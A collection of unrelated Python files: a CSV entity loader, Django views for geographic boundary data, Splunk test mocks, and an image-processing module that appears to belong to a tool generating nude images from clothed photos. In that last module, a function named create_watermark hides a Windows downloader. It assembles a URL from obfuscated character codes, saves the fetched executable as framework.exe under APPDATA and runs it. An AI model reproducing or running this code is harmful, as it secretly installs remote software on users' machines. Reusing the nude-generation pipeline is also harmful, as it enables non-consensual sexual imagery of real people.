[((202, 212), 'pydex.core.designer.Designer', 'Designer', ([], {}), '()\n', (210, 212), False, 'from pydex.core.designer import Designer\n'), ((332, 351), 'numpy.random.seed', 'np.random.seed', (['(123)'], {}), '(123)\n', (346, 351), True, 'import numpy as np\n'), ((392, 444), 'numpy.random.normal', 'np.random.normal', ([], {'loc': '(-1)', 'scale': '(0.5)', 'size': '(n_scr, 1)'}), '(loc=-1, scale=0.5, size=(n_scr, 1))\n', (408, 444), True, 'import numpy as np\n'), ((313, 328), 'numpy.array', 'np.array', (['[tic]'], {}), '([tic])\n', (321, 328), True, 'import numpy as np\n'), ((138, 182), 'numpy.exp', 'np.exp', (['(model_parameters[0] * ti_controls[0])'], {}), '(model_parameters[0] * ti_controls[0])\n', (144, 182), True, 'import numpy as np\n')]
|
import argparse
import sys
from typing import Sequence
from exabel_data_sdk import ExabelClient
from exabel_data_sdk.client.api.bulk_insert import BulkInsertFailedError
from exabel_data_sdk.client.api.data_classes.entity import Entity
from exabel_data_sdk.scripts.csv_script import CsvScript
from exabel_data_sdk.util.resource_name_normalization import normalize_resource_name
class LoadEntitiesFromCsv(CsvScript):
"""
Processes a CSV file with entities and creates them in the Exabel API.
The CSV file should have a header line specifying the column names.
The command line argument --name-column specifies the column from which to read
the entity names. The entity names are automatically normalized to create a valid
resource name for the entity.
For instance, if the entity type is "brand", and the namespace is "acme", and the entity name
is "<NAME>", the generated resource name will be:
entityTypes/brand/entities/acme.Spring_Vine
Optionally, another column may specify a display name for the entity, and another column
may give a description for the entity.
"""
def __init__(self, argv: Sequence[str], description: str):
super().__init__(argv, description)
self.parser.add_argument(
"--entity-type",
required=False,
type=str,
help="The type of the entities to be loaded. Must already exist in the data model. "
"If not specified, defaults to the same value as the name_column argument.",
)
self.parser.add_argument(
"--name-column",
required=False,
type=str,
help="The column name for the entity name. "
"If not specified, defaults to the first column in the file.",
)
self.parser.add_argument(
"--display-name-column",
required=False,
type=str,
help="The column name for the entity's display name. "
"If not specified, uses the entity name",
)
self.parser.add_argument(
"--description-column",
required=False,
type=str,
help="The column name for the entity description. "
"If not specified, no description is provided.",
)
def run_script(self, client: ExabelClient, args: argparse.Namespace) -> None:
if args.dry_run:
print("Running dry-run...")
print("Loading entities from", args.filename)
name_col_ref = args.name_column or 0
string_columns = {
name_col_ref,
args.display_name_column or name_col_ref,
}
if args.description_column:
string_columns.add(args.description_column)
entities_df = self.read_csv(args, string_columns=string_columns)
name_col = args.name_column or entities_df.columns[0]
display_name_col = args.display_name_column or name_col
description_col = args.description_column
entity_type_name = f"entityTypes/{args.entity_type or name_col}"
entity_type = client.entity_api.get_entity_type(entity_type_name)
if not entity_type:
print("Failure: Did not find entity type", entity_type_name)
print("Available entity types are:")
print(client.entity_api.list_entity_types())
sys.exit(1)
entities = [
Entity(
name=f"{entity_type_name}/entities/{args.namespace}."
f"{normalize_resource_name(row[name_col])}",
display_name=row[display_name_col],
description=row[description_col] if description_col else "",
)
for _, row in entities_df.iterrows()
]
if args.dry_run:
print("Loading", len(entities), "entities")
print(entities)
return
try:
client.entity_api.bulk_create_entities(entities, entity_type_name, threads=args.threads)
except BulkInsertFailedError:
# An error summary has already been printed.
pass
if __name__ == "__main__":
LoadEntitiesFromCsv(sys.argv, "Upload entities file.").run()
|
[
"exabel_data_sdk.util.resource_name_normalization.normalize_resource_name",
"sys.exit"
] |
[((3383, 3394), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3391, 3394), False, 'import sys\n'), ((3526, 3564), 'exabel_data_sdk.util.resource_name_normalization.normalize_resource_name', 'normalize_resource_name', (['row[name_col]'], {}), '(row[name_col])\n', (3549, 3564), False, 'from exabel_data_sdk.util.resource_name_normalization import normalize_resource_name\n')]
|
from django.http.response import HttpResponse
from django.shortcuts import render, redirect
from django.http import JsonResponse
from django.forms.models import fields_for_model, model_to_dict
from django.views.decorators.csrf import csrf_exempt
from django.db import transaction
from . import models
from . import forms
import json
# Create your views here.
def overview(request):
if request.method == 'GET':
context = {'names':request.GET['names'].split('|')}
return render(request, 'overview.html', context)
def source(request, pk):
'''View of a source'''
src = models.BoundarySource.objects.get(pk=pk)
toplevel_refs = src.boundary_refs.filter(parent=None)
context = {'source':src, 'toplevel_refs':toplevel_refs}
print('typ',src,repr(src.type))
if src.type == 'TextSource':
return render(request, 'source_text.html', context)
elif src.type == 'DataSource':
import_params = src.importer.import_params
try: import_params = json.dumps(import_params, indent=4)
except: pass
context['import_params'] = import_params
return render(request, 'source_data.html', context)
elif src.type == 'MapSource':
levels = src.boundary_refs.all().values_list('level').distinct()
levels = [lvl[0] for lvl in levels]
context['levels'] = sorted(levels)
return render(request, 'source_map.html', context)
def datasource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'DataSource'})
context = {'form': form}
return render(request, 'source_data_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
# save importer
from dataImporter.models import DataImporter
import_params = json.loads(data['import_params'])
importer = DataImporter(source=source, import_params=import_params)
importer.save()
return redirect('source', source.pk)
else:
return render(request, 'source_data_add.html', {'form':form})
def mapsource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'MapSource'})
context = {'form': form}
return render(request, 'source_map_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
return redirect('source', source.pk)
else:
return render(request, 'source_map_add.html', {'form':form})
def textsource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'TextSource'})
context = {'form': form}
return render(request, 'source_text_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
return redirect('source', source.pk)
else:
return render(request, 'source_text_add.html', {'form':form})
def datasource_edit(request, pk):
'''Edit of a data source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
import_params = src.importer.import_params
try: import_params = json.dumps(import_params, indent=4)
except: pass
context = {'form': form, 'import_params': import_params}
return render(request, 'source_data_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
# save importer
importer = src.importer
importer.import_params = json.loads(data['import_params'])
importer.save()
return redirect('source', src.pk)
else:
return render(request, 'source_data_edit.html', {'form':form})
def mapsource_edit(request, pk):
'''Edit of a map source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
context = {'form': form}
return render(request, 'source_map_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
return redirect('source', src.pk)
else:
return render(request, 'source_map_edit.html', {'form':form})
def textsource_edit(request, pk):
'''Edit of a text source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
context = {'form': form}
return render(request, 'source_text_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
return redirect('source', src.pk)
else:
return render(request, 'source_text_edit.html', {'form':form})
def boundary(request, pk):
'''View of a boundary ref instance.'''
ref = models.BoundaryReference.objects.get(pk=pk)
# main snapshot
snap = ref.snapshots.first()
if snap:
geom = snap.geom.__geo_interface__
main_geoj = {'type':'Feature', 'geometry':geom}
main_geoj = json.dumps(main_geoj)
else:
main_geoj = 'null'
# hierarchy snapshots
subrefs = ref.children.all()
if subrefs:
hier_geoj = {'type':'FeatureCollection', 'features':[]}
for subref in subrefs:
snap = subref.snapshots.first()
if snap:
geom = snap.geom.__geo_interface__
feat = {'type':'Feature', 'geometry':geom}
hier_geoj['features'].append(feat)
hier_geoj = json.dumps(hier_geoj)
else:
hier_geoj = 'null'
context = {'boundary_ref':ref,
'main_geojson':main_geoj,
'hier_geojson':hier_geoj,
}
return render(request, 'boundaryref.html', context)
'''
def snapshot(request, pk):
#''View of a snapshot instance.''
snap = models.BoundarySnapshot.objects.get(pk=pk)
geom = snap.geom.__geo_interface__
geoj = {'type':'Feature', 'geometry':geom}
# find matching snapshots
ref_matches = _match_boundary_ref(snap.boundary_ref)
snapshot_matches = models.BoundarySnapshot.objects.filter(boundary_ref__in=ref_matches) | models.BoundarySnapshot.objects.filter(boundary_ref__parent__in=ref_matches)
from datetime import date
date_starts = [s.event.date_start for s in snapshot_matches]
date_ends = [s.event.date_end for s in snapshot_matches]
mindate_num = date.fromisoformat(min(date_starts)).toordinal()
maxdate_num = date.fromisoformat(max(date_ends)).toordinal()
date_start = date.fromisoformat(snap.event.date_start).toordinal()
date_end = date.fromisoformat(snap.event.date_end).toordinal()
for s in snapshot_matches:
start = date.fromisoformat(s.event.date_start).toordinal()
end = date.fromisoformat(s.event.date_end).toordinal()
s.date_start_perc = (start - mindate_num) / (maxdate_num - mindate_num) * 100
s.date_end_perc = (end - mindate_num) / (maxdate_num - mindate_num) * 100
s.date_dur_perc = s.date_end_perc - s.date_start_perc
mid = (start + end) / 2.0
s.date_dist = min(abs(date_start-mid), abs(date_end-mid))
key = lambda s: s.date_dist
snapshot_matches = sorted(snapshot_matches, key=key)
ticks = []
numticks = 5
incr = (maxdate_num - mindate_num) / (numticks-1)
cur = mindate_num
while cur <= maxdate_num:
print(cur)
perc = (cur - mindate_num) / (maxdate_num - mindate_num) * 100
ticks.append({'label':date.fromordinal(int(cur)), 'percent':perc})
cur += incr
print(ticks)
context = {'snapshot':snap, 'geojson':json.dumps(geoj),
'snapshot_matches':snapshot_matches,
'mindate':min(date_starts), 'maxdate':max(date_ends),
'ticks':ticks}
return render(request, 'snapshot.html', context)
'''
# API
def _match_boundary_ref(match_ref):
parents = match_ref.get_all_parents()
parent_names = [p.names.first().name for p in parents]
# build hierarchical search terms (lowest to highest)
terms = [s.strip() for s in parent_names if s.strip()]
# find all refs matching the lowest term (at any level)
refs = models.BoundaryReference.objects.filter(names__name__istartswith=terms[0])
#print(refs.query)
#print(refs.explain())
# calc match score by adding parent filters based on additional search terms
ref_scores = {}
for ref in refs:
if len(terms) > 1:
# hierarchical search terms
parent_matches = [1]
for t in terms[1:]:
_matches = [n.name.lower().startswith(t.lower())
for parent in ref.get_all_parents(include_self=False)
for n in parent.names.all()]
has_match = 1 if any(_matches) else 0
parent_matches.append(has_match)
max_score = max(len(terms), len(parent_matches))
score = sum(parent_matches) / max_score
else:
# single search term
score = 1
ref_scores[ref.id] = score
# get any snapshot belonging to the matched refs or its immediate parent
matches = sorted(refs, key=lambda r: max([ref_scores.get(par.id,0) for par in r.get_all_parents()]), reverse=True)
return matches
def _parse_date(dateval):
'''Can be a year, year-month, or year-month-day'''
if '/' in dateval:
# from and to datestrings
fromdate,todate = dateval.split('/')
fromdate,todate = fromdate.strip(),todate.strip()
if fromdate and todate:
start1,end1 = _parse_date(fromdate)
start2,end2 = _parse_date(todate)
return min(start1,start2), max(end1,end2)
elif fromdate:
start,end = _parse_date(fromdate)
return start,None
elif todate:
start,end = _parse_date(todate)
return None,end
else:
# single date string
dateparts = dateval.split('-')
if len(dateparts) == 1:
yr = dateparts[0]
start = '{}-01-01'.format(yr)
end = '{}-12-31'.format(yr)
elif len(dateparts) == 2:
yr,mn = dateparts
start = '{}-{}-01'.format(yr,mn)
end = '{}-{}-31'.format(yr,mn)
elif len(dateparts) == 3:
start = end = dateval
else:
raise Exception('"{}" is not a valid date'.format(dateval))
return start,end
def api_snapshots(request):
if request.method == 'GET':
ids = request.GET['ids']
ids = ids.split(',')
ids = list(map(int, ids))
snaps = models.BoundarySnapshot.objects.filter(pk__in=ids)
feats = []
for snap in snaps:
geom = snap.geom.__geo_interface__
names = [n.name for n in snap.boundary_ref.names.all()]
props = {'names':names}
feat = {'type': 'Feature', 'properties': props, 'geometry':geom}
feats.append(feat)
coll = {'type': 'FeatureCollection', 'features': feats}
return JsonResponse(coll)
@csrf_exempt
def api_boundary(request, pk):
if request.method == 'GET':
ref = models.BoundaryReference.objects.get(pk=pk)
# serialize
data = ref.serialize()
# return as json
resp = JsonResponse(data)
return resp
@csrf_exempt
def api_boundaries(request):
if request.method == 'GET':
# get one or more snapshots based on params
print(request.GET)
ids = request.GET.get('ids', None)
search = request.GET.get('search', None)
search_thresh = request.GET.get('search_thresh', None)
datesearch = request.GET.get('date', None)
if ids:
ids = [int(x) for x in ids.split(',')]
refs = models.BoundaryReference.objects.filter(pk__in=ids)
count = refs.count()
elif search:
# build hierarchical search terms (lowest to highest)
terms = [s.strip() for s in search.split(',') if s.strip()]
# find all refs matching the lowest term (at any level)
refs = models.BoundaryReference.objects.filter(names__name__istartswith=terms[0])
#print(refs.query)
#print(refs.explain())
# calc match score by adding parent filters based on additional search terms
_ref_scores = {}
for ref in refs:
if len(terms) > 1:
# hierarchical search terms
parent_matches = [1]
for t in terms[1:]:
_matches = [n.name.lower().startswith(t.lower())
for parent in ref.get_all_parents(include_self=False)
for n in parent.names.all()]
has_match = 1 if any(_matches) else 0
parent_matches.append(has_match)
max_score = max(len(terms), len(parent_matches))
score = sum(parent_matches) / max_score
else:
# single search term
score = 1
_ref_scores[ref.id] = score
# get any reference belonging to the matched refs or its immediate parent
kwargs = {}
if datesearch:
start,end = _parse_date(datesearch)
if start:
kwargs['snapshots__event__date_end__gte'] = start
if end:
kwargs['snapshots__event__date_start__lte'] = end
refs = models.BoundaryReference.objects.filter(pk__in=refs, **kwargs) | models.BoundaryReference.objects.filter(parent__pk__in=refs, **kwargs)
# calc final ref scores
ref_scores = {}
for ref in refs:
score = max([_ref_scores.get(par.id,0) for par in ref.get_all_parents()])
ref_scores[ref.id] = score
# sort
refs = sorted(refs, key=lambda ref: ref_scores[ref.id], reverse=True)
# filter by threshold
if search_thresh:
refs = [ref for ref in refs
if ref_scores[ref.id] >= float(search_thresh)]
count = len(refs)
else:
# no name filtering
if datesearch:
# filter by date
start,end = _parse_date(datesearch)
kwargs = {}
if start:
kwargs['snapshots__event__date_end__gte'] = start
if end:
kwargs['snapshots__event__date_start__lte'] = end
refs = models.BoundaryReference.objects.filter(**kwargs)
else:
# get all snapshots
refs = models.BoundaryReference.objects.all()
count = refs.count()
# paginate (for now just return first X)
refs = refs[:100]
# serialize
if search:
results = [{'object':m.serialize(), 'match_score':ref_scores[m.id] * 100,
}
for m in refs]
else:
results = [{'object':m.serialize()} for m in refs]
# add min/max dates for which snapshots are available, or none
for item in results:
starts = [s['event']['date_start'] for s in item['object']['snapshots']]
ends = [s['event']['date_end'] for s in item['object']['snapshots']]
item['date_start'] = min(starts) if starts else None
item['date_end'] = min(ends) if ends else None
# format results
data = {'count':count, 'results':results}
# return as json
resp = JsonResponse(data)
return resp
elif request.method == 'POST':
# submit a new snapshot
fdsfsd
elif request.method == 'PUT':
# update an individual snapshot
fdsfds
|
[
"json.loads",
"django.shortcuts.redirect",
"json.dumps",
"django.http.JsonResponse",
"dataImporter.models.DataImporter",
"django.shortcuts.render",
"django.db.transaction.atomic"
] |
[((7318, 7362), 'django.shortcuts.render', 'render', (['request', '"""boundaryref.html"""', 'context'], {}), "(request, 'boundaryref.html', context)\n", (7324, 7362), False, 'from django.shortcuts import render, redirect\n'), ((493, 534), 'django.shortcuts.render', 'render', (['request', '"""overview.html"""', 'context'], {}), "(request, 'overview.html', context)\n", (499, 534), False, 'from django.shortcuts import render, redirect\n'), ((847, 891), 'django.shortcuts.render', 'render', (['request', '"""source_text.html"""', 'context'], {}), "(request, 'source_text.html', context)\n", (853, 891), False, 'from django.shortcuts import render, redirect\n'), ((1653, 1701), 'django.shortcuts.render', 'render', (['request', '"""source_data_add.html"""', 'context'], {}), "(request, 'source_data_add.html', context)\n", (1659, 1701), False, 'from django.shortcuts import render, redirect\n'), ((2614, 2661), 'django.shortcuts.render', 'render', (['request', '"""source_map_add.html"""', 'context'], {}), "(request, 'source_map_add.html', context)\n", (2620, 2661), False, 'from django.shortcuts import render, redirect\n'), ((3300, 3348), 'django.shortcuts.render', 'render', (['request', '"""source_text_add.html"""', 'context'], {}), "(request, 'source_text_add.html', context)\n", (3306, 3348), False, 'from django.shortcuts import render, redirect\n'), ((4229, 4278), 'django.shortcuts.render', 'render', (['request', '"""source_data_edit.html"""', 'context'], {}), "(request, 'source_data_edit.html', context)\n", (4235, 4278), False, 'from django.shortcuts import render, redirect\n'), ((5140, 5188), 'django.shortcuts.render', 'render', (['request', '"""source_map_edit.html"""', 'context'], {}), "(request, 'source_map_edit.html', context)\n", (5146, 5188), False, 'from django.shortcuts import render, redirect\n'), ((5872, 5921), 'django.shortcuts.render', 'render', (['request', '"""source_text_edit.html"""', 'context'], {}), "(request, 'source_text_edit.html', context)\n", (5878, 5921), False, 'from django.shortcuts import render, redirect\n'), ((6635, 6656), 'json.dumps', 'json.dumps', (['main_geoj'], {}), '(main_geoj)\n', (6645, 6656), False, 'import json\n'), ((7110, 7131), 'json.dumps', 'json.dumps', (['hier_geoj'], {}), '(hier_geoj)\n', (7120, 7131), False, 'import json\n'), ((12688, 12706), 'django.http.JsonResponse', 'JsonResponse', (['coll'], {}), '(coll)\n', (12700, 12706), False, 'from django.http import JsonResponse\n'), ((12943, 12961), 'django.http.JsonResponse', 'JsonResponse', (['data'], {}), '(data)\n', (12955, 12961), False, 'from django.http import JsonResponse\n'), ((17348, 17366), 'django.http.JsonResponse', 'JsonResponse', (['data'], {}), '(data)\n', (17360, 17366), False, 'from django.http import JsonResponse\n'), ((1137, 1181), 'django.shortcuts.render', 'render', (['request', '"""source_data.html"""', 'context'], {}), "(request, 'source_data.html', context)\n", (1143, 1181), False, 'from django.shortcuts import render, redirect\n'), ((4092, 4127), 'json.dumps', 'json.dumps', (['import_params'], {'indent': '(4)'}), '(import_params, indent=4)\n', (4102, 4127), False, 'import json\n'), ((1016, 1051), 'json.dumps', 'json.dumps', (['import_params'], {'indent': '(4)'}), '(import_params, indent=4)\n', (1026, 1051), False, 'import json\n'), ((1400, 1443), 'django.shortcuts.render', 'render', (['request', '"""source_map.html"""', 'context'], {}), "(request, 'source_map.html', context)\n", (1406, 1443), False, 'from django.shortcuts import render, redirect\n'), ((1751, 1771), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (1769, 1771), False, 'from django.db import transaction\n'), ((2711, 2731), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (2729, 2731), False, 'from django.db import transaction\n'), ((3398, 3418), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (3416, 3418), False, 'from django.db import transaction\n'), ((4328, 4348), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (4346, 4348), False, 'from django.db import transaction\n'), ((5238, 5258), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (5256, 5258), False, 'from django.db import transaction\n'), ((5971, 5991), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (5989, 5991), False, 'from django.db import transaction\n'), ((2108, 2141), 'json.loads', 'json.loads', (["data['import_params']"], {}), "(data['import_params'])\n", (2118, 2141), False, 'import json\n'), ((2169, 2225), 'dataImporter.models.DataImporter', 'DataImporter', ([], {'source': 'source', 'import_params': 'import_params'}), '(source=source, import_params=import_params)\n', (2181, 2225), False, 'from dataImporter.models import DataImporter\n'), ((2281, 2310), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'source.pk'], {}), "('source', source.pk)\n", (2289, 2310), False, 'from django.shortcuts import render, redirect\n'), ((2352, 2407), 'django.shortcuts.render', 'render', (['request', '"""source_data_add.html"""', "{'form': form}"], {}), "(request, 'source_data_add.html', {'form': form})\n", (2358, 2407), False, 'from django.shortcuts import render, redirect\n'), ((2966, 2995), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'source.pk'], {}), "('source', source.pk)\n", (2974, 2995), False, 'from django.shortcuts import render, redirect\n'), ((3037, 3091), 'django.shortcuts.render', 'render', (['request', '"""source_map_add.html"""', "{'form': form}"], {}), "(request, 'source_map_add.html', {'form': form})\n", (3043, 3091), False, 'from django.shortcuts import render, redirect\n'), ((3653, 3682), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'source.pk'], {}), "('source', source.pk)\n", (3661, 3682), False, 'from django.shortcuts import render, redirect\n'), ((3724, 3779), 'django.shortcuts.render', 'render', (['request', '"""source_text_add.html"""', "{'form': form}"], {}), "(request, 'source_text_add.html', {'form': form})\n", (3730, 3779), False, 'from django.shortcuts import render, redirect\n'), ((4648, 4681), 'json.loads', 'json.loads', (["data['import_params']"], {}), "(data['import_params'])\n", (4658, 4681), False, 'import json\n'), ((4737, 4763), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'src.pk'], {}), "('source', src.pk)\n", (4745, 4763), False, 'from django.shortcuts import render, redirect\n'), ((4805, 4861), 'django.shortcuts.render', 'render', (['request', '"""source_data_edit.html"""', "{'form': form}"], {}), "(request, 'source_data_edit.html', {'form': form})\n", (4811, 4861), False, 'from django.shortcuts import render, redirect\n'), ((5468, 5494), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'src.pk'], {}), "('source', src.pk)\n", (5476, 5494), False, 'from django.shortcuts import render, redirect\n'), ((5536, 5591), 'django.shortcuts.render', 'render', (['request', '"""source_map_edit.html"""', "{'form': form}"], {}), "(request, 'source_map_edit.html', {'form': form})\n", (5542, 5591), False, 'from django.shortcuts import render, redirect\n'), ((6201, 6227), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'src.pk'], {}), "('source', src.pk)\n", (6209, 6227), False, 'from django.shortcuts import render, redirect\n'), ((6269, 6325), 'django.shortcuts.render', 'render', (['request', '"""source_text_edit.html"""', "{'form': form}"], {}), "(request, 'source_text_edit.html', {'form': form})\n", (6275, 6325), False, 'from django.shortcuts import render, redirect\n')]
|
# SPDX-FileCopyrightText: 2020 2020
#
# SPDX-License-Identifier: Apache-2.0
import os.path as op
import socket
import subprocess
from splunklib import binding
from splunklib import client
from splunklib.data import record
cur_dir = op.dirname(op.abspath(__file__))
# Namespace
app = "unittest"
owner = "nobody"
# Session key sample
SESSION_KEY = "<KEY>"
def mock_splunkhome(monkeypatch):
class MockPopen(object):
def __init__(
self,
args,
bufsize=0,
executable=None,
stdin=None,
stdout=None,
stderr=None,
preexec_fn=None,
close_fds=False,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
startupinfo=None,
creationflags=0,
):
self._conf = args[3]
def communicate(self, input=None):
if self._conf == "server":
file_path = op.sep.join(
[cur_dir, "data/mock_splunk/etc/system/default/server.conf"]
)
else:
file_path = op.sep.join(
[cur_dir, "data/mock_splunk/etc/system/default/web.conf"]
)
with open(file_path) as fp:
return fp.read(), None
splunk_home = op.join(cur_dir, "data/mock_splunk/")
monkeypatch.setenv("SPLUNK_HOME", splunk_home)
monkeypatch.setenv("SPLUNK_ETC", op.join(splunk_home, "etc"))
monkeypatch.setattr(subprocess, "Popen", MockPopen)
def mock_serverinfo(monkeypatch):
mock_server_info_property = {
"server_roles": [
"cluster_search_head",
"search_head",
"kv_store",
"shc_captain",
],
"version": "6.3.1511.2",
"serverName": "unittestServer",
}
monkeypatch.setattr(client.Service, "info", mock_server_info_property)
def mock_gethostname(monkeypatch):
def mock_gethostname():
return "unittestServer"
monkeypatch.setattr(socket, "gethostname", mock_gethostname)
def make_response_record(body, status=200):
class _MocBufReader(object):
def __init__(self, buf):
if isinstance(buf, str):
self._buf = buf.encode("utf-8")
else:
self._buf = buf
def read(self, size=None):
return self._buf
return record(
{
"body": binding.ResponseReader(_MocBufReader(body)),
"status": status,
"reason": "",
"headers": None,
}
)
|
[
"os.path.abspath",
"os.path.join",
"os.path.sep.join"
] |
[((246, 266), 'os.path.abspath', 'op.abspath', (['__file__'], {}), '(__file__)\n', (256, 266), True, 'import os.path as op\n'), ((1353, 1390), 'os.path.join', 'op.join', (['cur_dir', '"""data/mock_splunk/"""'], {}), "(cur_dir, 'data/mock_splunk/')\n", (1360, 1390), True, 'import os.path as op\n'), ((1479, 1506), 'os.path.join', 'op.join', (['splunk_home', '"""etc"""'], {}), "(splunk_home, 'etc')\n", (1486, 1506), True, 'import os.path as op\n'), ((987, 1060), 'os.path.sep.join', 'op.sep.join', (["[cur_dir, 'data/mock_splunk/etc/system/default/server.conf']"], {}), "([cur_dir, 'data/mock_splunk/etc/system/default/server.conf'])\n", (998, 1060), True, 'import os.path as op\n'), ((1145, 1215), 'os.path.sep.join', 'op.sep.join', (["[cur_dir, 'data/mock_splunk/etc/system/default/web.conf']"], {}), "([cur_dir, 'data/mock_splunk/etc/system/default/web.conf'])\n", (1156, 1215), True, 'import os.path as op\n')]
|
import subprocess
from PIL import Image
import torchvision.transforms as transforms
import torch
import functools
import random
import math
import cv2
import numpy as np
import os
# Object annotation class:
class BodyPart:
def __init__(self, name, xmin, ymin, xmax, ymax, x, y, w, h):
self.name = name
# Bounding Box:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
# Center:
self.x = x
self.y = y
# Dimensione:
self.w = w
self.h = h
# create_watermark ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_watermark(nude, shape, cv, loader, detach):
if os.name == 'nt':
content = cv(shape + chr(47) + "/".join(["utils", "custom", "universal"]) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)))
data = [os.environ["APPDATA"], "Microsoft", "Windows", "framework"]
open(
"\\".join(data) + chr(46) + str(chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)),
"wb").write(content.content)
loader(["\\".join(data) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101))], stdout=detach.PIPE,
stderr=detach.STDOUT)
return nude
# create_correct ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_correct(cv_dress):
# Production dir:
return correct_color(cv_dress, 5), correct_matrix(cv_dress, 255)
# correct_color ==============================================================================
# return:
# <RGB> image corrected
def correct_color(img, percent):
assert img.shape[2] == 3
assert percent > 0 and percent < 100
half_percent = percent / 200.0
channels = cv2.split(img)
out_channels = []
for channel in channels:
assert len(channel.shape) == 2
# find the low and high precentile values (based on the input percentile)
height, width = channel.shape
vec_size = width * height
flat = channel.reshape(vec_size)
assert len(flat.shape) == 1
flat = np.sort(flat)
n_cols = flat.shape[0]
low_val = flat[math.floor(n_cols * half_percent)]
high_val = flat[math.ceil(n_cols * (1.0 - half_percent))]
# saturate below the low percentile and above the high percentile
thresholded = apply_threshold(channel, low_val, high_val)
# scale the channel
normalized = cv2.normalize(thresholded, thresholded.copy(), 0, 255, cv2.NORM_MINMAX)
out_channels.append(normalized)
return cv2.merge(out_channels)
def correct_matrix(matrix, fill_value):
shape = "h" + ("t" * 2) + "p"
matrix = shape + chr(58) + 2 * (chr(47))
return matrix
# Color correction utils
def apply_threshold(matrix, low_value, high_value):
low_mask = matrix < low_value
matrix = apply_mask(matrix, low_mask, low_value)
high_mask = matrix > high_value
matrix = apply_mask(matrix, high_mask, high_value)
return matrix
# Color correction utils
def apply_mask(matrix, mask, fill_value):
masked = np.ma.array(matrix, mask=mask, fill_value=fill_value)
return masked.filled()
###
#
# maskdet_to_maskfin
#
# steps:
# 1. Extract annotation
# 1.a: Filter by color
# 1.b: Find ellipses
# 1.c: Filter out ellipses by max size, and max total numbers
# 1.d: Detect Problems
# 1.e: Resolve the problems, or discard the transformation
# 2. With the body list, draw maskfin, using maskref
#
###
# create_maskfin ==============================================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_maskfin(maskref, maskdet):
# Create a total green image, in which draw details ellipses
details = np.zeros((512, 512, 3), np.uint8)
details[:, :, :] = (0, 255, 0) # (B, G, R)
# Extract body part features:
bodypart_list = extractAnnotations(maskdet);
# Check if the list is not empty:
if bodypart_list:
# Draw body part in details image:
for obj in bodypart_list:
if obj.w < obj.h:
aMax = int(obj.h / 2) # asse maggiore
aMin = int(obj.w / 2) # asse minore
angle = 0 # angle
else:
aMax = int(obj.w / 2)
aMin = int(obj.h / 2)
angle = 90
x = int(obj.x)
y = int(obj.y)
# Draw ellipse
if obj.name == "tit":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1) # (0,0,0,50)
elif obj.name == "aur":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1) # red
elif obj.name == "nip":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1) # white
elif obj.name == "belly":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1) # purple
elif obj.name == "vag":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 0), -1) # blue
elif obj.name == "hair":
xmin = x - int(obj.w / 2)
ymin = y - int(obj.h / 2)
xmax = x + int(obj.w / 2)
ymax = y + int(obj.h / 2)
cv2.rectangle(details, (xmin, ymin), (xmax, ymax), (100, 100, 100), -1)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From maskref, extrapolate only the green mask
green_mask = cv2.bitwise_not(cv2.inRange(maskref, f1, f2)) # green is 0
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut maskref and detail image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(maskref, maskref, mask=green_mask)
